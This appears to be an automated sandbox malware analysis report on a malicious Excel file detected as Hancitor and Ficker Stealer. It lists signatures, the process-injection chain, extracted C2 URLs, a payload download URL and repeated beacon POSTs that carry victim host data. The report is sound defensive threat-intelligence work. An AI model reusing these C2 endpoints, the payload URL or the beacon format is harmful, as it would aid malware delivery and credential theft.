
Windows Analysis Report 0722_2857746751.xls

Overview

General Information

Sample Name: 0722_2857746751.xls
Analysis ID: 452590
MD5: 97538e922b86b2ae95625d1e11e6aaf1
SHA1: 928e4d89b379bdd7c894787431a8d0b42f28a5a4
SHA256: 83c9c9beaca0a147e23995b84792f56cd130ccf262147374bd1114c2ac698fee

Detection

Ficker Stealer, Hancitor
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Suspect Svchost Activity
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Ficker Stealer
Yara detected Hancitor
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Document contains OLE streams with PE executables
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Document exploit detected (process start blacklist hit)
May check the online IP address of the machine
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Svchost Process
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2404 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • imjppdmg.exe (PID: 1360 cmdline: /Migration MD5: 3716DEC1E0B88BB19968BBC2659B02A1)
    • rundll32.exe (PID: 2384 cmdline: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2364 cmdline: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • svchost.exe (PID: 2292 cmdline: C:\Windows\System32\svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
  • cleanup

Malware Configuration

Threatname: Hancitor

{"Campaign Id": "2207_xwpi67", "C2 list": ["http://tholeferli.com/8/forum.php", "http://aidgodown.ru/8/forum.php", "http://relifleappin.ru/8/forum.php"]}

Yara Overview

Memory Dumps

Source: 00000007.00000002.2132921997.000000000022B000.00000004.00000020.sdmp, Rule: JoeSecurity_Ficker_Stealer_1, Description: Yara detected Ficker Stealer, Author: Joe Security
Source: 00000005.00000003.2121584965.00000000001D0000.00000040.00000001.sdmp, Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Author: Joe Security
Source: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp, Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Author: Joe Security
Source: Process Memory Space: svchost.exe PID: 2292, Rule: JoeSecurity_Ficker_Stealer_1, Description: Yara detected Ficker Stealer, Author: Joe Security
Source: Process Memory Space: rundll32.exe PID: 2364, Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Author: Joe Security

Unpacked PEs

Source: 5.3.rundll32.exe.1d438c.0.raw.unpack, Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Author: Joe Security
Source: 5.3.rundll32.exe.1d438c.0.raw.unpack, Rule: Hancitor, Description: Hancitor Payload, Author: kevoreilly
  • 0x116f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
Source: 5.3.rundll32.exe.1d438c.0.unpack, Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Author: Joe Security
Source: 5.3.rundll32.exe.1d438c.0.unpack, Rule: Hancitor, Description: Hancitor Payload, Author: kevoreilly
  • 0x56f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
Source: 5.2.rundll32.exe.340000.0.unpack, Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity
Source: Process started, Author: David Burkett, Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2364, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 2292
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Data: Command: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2404, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB, ProcessId: 2384
Sigma detected: Suspicious Svchost Process
Source: Process started, Author: Florian Roth, Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2364, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 2292

Jbx Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://s0lom0n.ru/7hsjfd9w4refsd.exe, Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000005.00000003.2121584965.00000000001D0000.00000040.00000001.sdmp, Malware Configuration Extractor: Hancitor {"Campaign Id": "2207_xwpi67", "C2 list": ["http://tholeferli.com/8/forum.php", "http://aidgodown.ru/8/forum.php", "http://relifleappin.ru/8/forum.php"]}
Multi AV Scanner detection for domain / URL
Source: pospvisis.com, Virustotal: Detection: 13%
Multi AV Scanner detection for submitted file
Source: 0722_2857746751.xls, Virustotal: Detection: 29%
Source: 0722_2857746751.xls, ReversingLabs: Detection: 22%
Source: 5.2.rundll32.exe.340000.0.unpack, Avira: Label: TR/Hijacker.Gen

Location Tracking:

Yara detected Hancitor
Source: Yara match, File source: 5.3.rundll32.exe.1d438c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.3.rundll32.exe.1d438c.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000005.00000003.2121584965.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 2364, type: MEMORY
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_00342CD0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_00342CD0
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_00342D17 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_00342D17
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_00342D98 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_00342D98
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_00342D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_00342D78
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_00342D55 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_00342D55
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_0040BAB5 CryptUnprotectData,7_2_0040BAB5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: c:\Star\danger\Air_Night\recei\Paragraph.pdb source: rundll32.exe, 00000005.00000002.2348584640.0000000000359000.00000002.00020000.sdmp, 0722_2857746751.xls

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Temp\532.dll
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: 532.dll.0.dr
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\rundll32.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic, DNS query: name: api.ipify.org
Potential document exploit detected (unknown TCP traffic)
Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 54.235.88.121:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031074 ET TROJAN Win32/Ficker Stealer Activity 95.213.179.67:80 -> 192.168.2.22:49173
Source: Traffic, Snort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.22:49173 -> 95.213.179.67:80
Source: Traffic, Snort IDS: 2031074 ET TROJAN Win32/Ficker Stealer Activity 95.213.179.67:80 -> 192.168.2.22:49178
Source: Traffic, Snort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.22:49178 -> 95.213.179.67:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: http://tholeferli.com/8/forum.php
Source: Malware configuration extractor, URLs: http://aidgodown.ru/8/forum.php
Source: Malware configuration extractor, URLs: http://relifleappin.ru/8/forum.php
May check the online IP address of the machine
Source: C:\Windows\SysWOW64\rundll32.exe, DNS query: name: api.ipify.org
Source: C:\Windows\SysWOW64\svchost.exe, DNS query: name: api.ipify.org
Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Thu, 22 Jul 2021 14:11:04 GMT | Content-Type: application/octet-stream | Content-Length: 272910 | Connection: keep-alive | Last-Modified: Wed, 09 Jun 2021 16:00:40 GMT | ETag: "60c0e5a8-42a0e" | Accept-Ranges: bytes
Source: Joe Sandbox View, IP Address: 8.211.241.0
Source: Joe Sandbox View, ASN Name: AMAZON-AESUS
Source: Joe Sandbox View, ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: api.ipify.org | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST /8/forum.php HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: tholeferli.com | Content-Length: 110 | Cache-Control: no-cache | Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Source: global traffic, HTTP traffic detected: GET /7hsjfd9w4refsd.exe HTTP/1.1 | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: s0lom0n.ru | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /?format=xml HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: api.ipify.org | Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
